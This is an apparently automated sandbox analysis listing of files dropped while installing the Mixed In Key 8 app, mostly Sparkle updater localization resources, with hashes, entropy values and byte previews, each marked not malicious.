Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_reJ0Cw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6532
Entropy (8bit):	3.527753638948378
Encrypted:	false
SSDEEP:	192:MAWIUWWTvD+3SWuX9K707+kOWn5DATIoRWbVa:a6Wp4Yz5DATNwbVa
MD5:	B8EA8C26AA67B4AE84A74FA7B24B3C0A
SHA1:	CEDE8F0150CC6BC8C658636ADFE262DBC9AB6C1B
SHA-256:	428A301C3A9F7BC16E8B8FDEF9441C19D25EE834C16C53B0164D7A6D27A1B529
SHA-512:	B47B0DB572EDD84D42FAC7FAE393B93A7B779D72E0780510D64C492382137B5EA7F2067CE40E309A446CBEB2B8660E8817C72BB862923DB729EA0D5DB4C068B4
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".A.p.l.i.k...c.i.a. .%.1.$.@. .%.2.$.@. .b.o.l.a. .p.r.e.v.z.a.t... .a. .j.e. .p.r.i.p.r.a.v.e.n... .n.a. .p.o.u.~.i.t.i.e.!. .C.h.c.e.t.e. .t.e.r.a.z. .n.a.i.n.a.t.a.l.o.v.a.e. .a. .n...s.l.e.d.n.e. .z.n.o.v.u. .s.p.u.s.t.i.e. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".A.p.l.i.k...c.i.u. .%.1.$.@. .n.e.m.o.~.n.o. .a.k.t.u.a.l.i.z.o.v.a.e.,. .a.k. .j.e. .s.p.u.s.t.e.n... .z.o. .z.v...z.k.u. .s. .p.r...v.a.m.i. .l.e.n. .n.a. .....t.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_u640dB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15556
Entropy (8bit):	6.783251080117518
Encrypted:	false
SSDEEP:	384:RkgPpE0DeEYNg7uH4+rC3MJtDyvqp+3mvONV6gNRH:RkgPDeEYyOC3MJz43/6E
MD5:	E29B38E0DD7C1AA2CC8EC34E572D4504
SHA1:	A7CA9198C9497604587755C667575B3CE298DD70
SHA-256:	256374A826ABE467E6311B945E205A147960A6906B588EF128201F9C4654179E
SHA-512:	2245BBCB5DD05FCD57567002BEB7886A07D249FF153E83106A56D074FAF5C558AF032B70F3499B758B3093EDD6F5CA0028B0FE73F5A9EE4BABBBC4C5B61A2B08
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.\|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys................. ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_UI2NDC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15594
Entropy (8bit):	6.803319539595778
Encrypted:	false
SSDEEP:	384:T6gHE00eEYNg7wzsnZPbrJt4G3v9iSaZl5yQzLxPLO/XbP:T6gieEYyZjrJKGcZlsgZ4r
MD5:	6A1ECB3CEADED67700DA651FC72C3039
SHA1:	6C17203EA2105476797625EEB1335429153385E3
SHA-256:	51FCFFA71BBE459DB5FF79A7B5A2820D6DB434AEEB7C7BCE8B29D3C1FCB1D595
SHA-512:	CCED4C7CC7DBB1184AA8CDAA24AB3833D303DCBDEA75A525D88616244A8E63821571BAFF61D749B62346FA816652044AAF4C41E0F9E925E5B9BAEC5B3A1D2562
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$....2.D.L.`.i.j.z.{.......................................................................................'.(.).._.,.0.4.7.8.=.`.a.b.c.d.p...............................................................................&.).*.2.3.4.?.B.C.L.M.N.c.g.k.l.n.o.p.v.{.\|.........................................................................................................%.-.../.5.<.=.>.E.F.G.a.d.e.g.....^.^........................._......................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.C....4.5.6.7.8.9.:.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_tIoNk2 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12131
Entropy (8bit):	6.728992135695625
Encrypted:	false
SSDEEP:	192:5U1WxXXQOLyE0ltjeEYNMtKwCLJG+xn+8ts7sK5w4CW/scX/X5E:5UgxXXQwyE0PeEYNg7CLJG+LtWsefJE
MD5:	B2B170464DFCF809ADF4957CF02691AA
SHA1:	9CF8001F0F5BDEC15C271CDAA1D4B627637221D4
SHA-256:	343768859D980D41F7212098C238C62CDF6078BBFF48899132726CD7BA504E4F
SHA-512:	920A871612C1F2609A3F9D061FE3B8A0B3743A159E2EE89B6A447E09BF269784C0EC8F26BC341EF8719555AC075112F0E532CD59AC39E394348D7DB1E816978D
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w.......................................................................#.&.+.,.1.5.8.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_ytND4S Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18442
Entropy (8bit):	6.788125149248513
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+U3NAKAsif17lxAbF1lRbP8YU/8oWuSgBUIIdd:ZgZDeEYy+KAdR6lt4/8oBBZw
MD5:	712F3649184C4D46DAA74079C3376F18
SHA1:	529E4F067D76A4557F9C7C0FDD3D82744B7C6BBB
SHA-256:	4E98BD793A9A837D1C22EF1973718E8D9DF2C31CFFE988441891E631C61E7A60
SHA-512:	D55B248277B3400685C698549B22C9B4D3CE6E3A9289B4024709C8FA4EC8C97B1BC7A566BD6AC95459671BEB61603DA5F84745C349B160200FCBBE6B2C5E735B
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_0IXv9u Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12122
Entropy (8bit):	6.742609041199889
Encrypted:	false
SSDEEP:	192:zK1WxXkQOLDjE0lTjeEYNMtKwC/4IQfAsCs7sK5wNCZ/scX/cAQZP9S8ZN:zKgxXkQwDjE0NeEYNg7C/4IQ4TWsfYXM
MD5:	FDA9C8C7C9BDB86A27F0FEEDB0D628CC
SHA1:	F7B6A3AED1932359139569D1A5CFB5B5491B4910
SHA-256:	CF5C3455E7A9DF28E28DBC4F47EE7B1495ED5976491B3194AF680E22D7CC1979
SHA-512:	414F7DAC20EE997B884105CF1AE37638F46309132401FDC8FEF0C7A87981BC730AF55B0416473B8E271E8BA22A4E4072761A7A4646F31D031FF32E6E207CDEA5
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_B8O4t6 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6652
Entropy (8bit):	3.4251352277593035
Encrypted:	false
SSDEEP:	192:Mpw1VX3ZSxqi9clc5mGYKXw6fDiHnT3mLOQ42p:t18iHT3mKGp
MD5:	2746EAE286FF443AD7F211DF027C88B8
SHA1:	058667145C515325D9B2118AA1E18A38A65486F0
SHA-256:	88066F7907A507217DC64049B389B03EF0403A3F9DBE0C2EA43C423FE8187AE1
SHA-512:	E4E75258F6E8E56550154E4F8F30F1E22DFB5D6AB290EB903341ECDBE8FC16BCE2CFEE03C8D84EB098E3190C35EB251DAE473F7B3FEE07B2A2155F0230B3E56A
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .h.a.r. .l.a.d.d.a.t.s. .n.e.d. .o.c.h. ...r. .k.l.a.r. .a.t.t. .a.n.v...n.d.a.!. .V.i.l.l. .d.u. .i.n.s.t.a.l.l.e.r.a. .d.e.t. .o.c.h. .s.t.a.r.t.a. .%.1.$.@. .n.u.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .k.a.n. .i.n.t.e. .u.p.p.d.a.t.e.r.a.s. .n...r. .d.e.t. .k...r.s. .f.r...n. .e.n. .s.k.r.i.v.s.k.y.d.d.a.d. .v.o.l.y.m. .s.o.m. .e.n. .s.k.i.v.a.v.b.i.l.d. .e.l.l.e.r. .e.n. .o.p.t.i.s.k. .e.n.h.e.t... .F.l.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_UHQOLB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15617
Entropy (8bit):	6.806381954032716
Encrypted:	false
SSDEEP:	384:dgTfE0NeEYNg7ns2OFIcJtSxdP0ZuUO21fD:dgTveEYyDSIcJLt1ZD
MD5:	25D34001752A53DFC7CA88F32C8E2AAB
SHA1:	BC65CDCABC7A2596CC3BFBBF7D05DF986C704143
SHA-256:	1EACADDBF7AA1673DC2E5B6704A850E5B54B3DF2B790A6BA01CF74E9D256A4F8
SHA-512:	5F06CC7692F75DB87A27F6C5CD5E54A2E93937BFABC013AFA3902582978560242AF1221D8B6AAFA4DE390B6529C728699C4E0C631D65B5DBC3478E57D09EC473
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_p7BmtO Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18474
Entropy (8bit):	6.786027320935801
Encrypted:	false
SSDEEP:	384:ZgPpE0DeEYNg7uH4+53NAKAsTf17bhzb1lWbP8YU/8oWuSgBoogtSsVi:ZgPDeEYyZKAERDl84/8oBB1gtS0i
MD5:	3747AE674A2497804179EAFFA9C5D009
SHA1:	1274F0BB00C13D652846EF199CB9C27539FA24B8
SHA-256:	B0DBD0426A2A38897C13567CE5F9A0766E8F43AADA2BA2DDCF29CF2734849701
SHA-512:	529816C1A2B458B12117174D570908359888C319B15A6A1C951B53D6FB97EC215D75F4761F639DD2E2768CAEFD82C83AB641570B474AD80E47518AFABD91B48A
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_6SfLzu Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11223
Entropy (8bit):	6.735736806997574
Encrypted:	false
SSDEEP:	192:Ee1WI1xpDOT6E0lrjeEYNMtKwQN4PK8Lv+qJU32dTN3tyS/D:Eeg2pD5E0ZeEYNg7QN4y86qxddsqD
MD5:	31C2E1EA3EAF64965947D151876B3D2F
SHA1:	E8064B4DA48A0857902F827318FA9E909D33A1E3
SHA-256:	D07B6C376A6EAEE96E8E8BBFC070B31B710D7854F7D84FDA5960F4239A36F16C
SHA-512:	89EBC61EA52A8A08F94BCFBE4B604D93801F337645D4B89AA7AA5D5281985B716D63D58059D5A9031352F402961C7380CE380DF88D27EF48FA7E322BFB1F14F3
Malicious:	false
Preview:	bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.\|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_MqD6Yj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15628
Entropy (8bit):	6.834414513974042
Encrypted:	false
SSDEEP:	384:dgTfE0NeEYNg7ns2OFhxcJtSzaL0aUGeUtOieJI:dgTveEYyDShxcJ7YaUUAiF
MD5:	B75E225FB768CCAC01EEDC4D95254946
SHA1:	555C811213F960BA3D5B52BB652541C81EC570A3
SHA-256:	37008BC6A1949FABC52A2E02C84DAD652E6831D7DF643603F779CA2ADA621EDF
SHA-512:	B55CED5F17C11A5C065CEFF38E1C33BD435E2C16373ABD15A87B822E067B51DDE349E90E7502F333D10FE414A8369F0BDD5C8741ACD18E9197DE699B63A4A212
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_QNHIz1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18345
Entropy (8bit):	6.8638135665235565
Encrypted:	false
SSDEEP:	384:WgZpE0DeEYNg7uH4+U3NAKiswzI7q6IbClxAbOFA0Pg2uSgBE/8I:WgZDeEYy+KiPWq+lxAbH+ghB68I
MD5:	330AFBF3B387FA044225E08A41AFD791
SHA1:	B153381E78B3796CD631CE96AE39029903ED9E96
SHA-256:	9EC4F9C6353CFD6E14F78D0540E96A8E742030C8EB4BB1A5F1698E476B4EBBB5
SHA-512:	271A6658843B9FAE55AA921EA7CB9CBD906175ACA62D724C5BB04BF040E4FDB6DB0A130013A2D9B9D6D93531DB22DCA81289214460E5887C99C4A5086B79E8AB
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................$..+.,./.2.5.6.8.9.:.;.<.?.@.E.F.J.O.P.U.V.b.c.d.e.l.m.n.q.u.\|...............................................x.`.........................................@.s._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_RHYZHo Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12168
Entropy (8bit):	6.7611402735673884
Encrypted:	false
SSDEEP:	192:zK1WxXoQOLgjE0lTjeEYNMtKwC/4IrEUn4Cs7sK5wNCZ/scX/cAQZPUmGoFZ:zKgxXoQwgjE0NeEYNg7C/4IrEUnHWsfn
MD5:	236B61A253B3EFAEF6F8F02AF6AA15B7
SHA1:	2E6DE6333FA75968E3D63B371AC5E8BDB9397E55
SHA-256:	0E73E93B8D92C5623B9947FB57E8C473117673B4F74BCB9063B0F7A6D2EB02F9
SHA-512:	419AE5DACAFA61D671F0B41EFBA18D945C664141D99F2CEF2DDA7D3F886FB34C4FB32CEA68F30E73D54F9E19C1753C332F203F3A297D4E9DC66DA8CC7055EBBB
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_B3F5Zv Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	8442
Entropy (8bit):	3.5481119990129337
Encrypted:	false
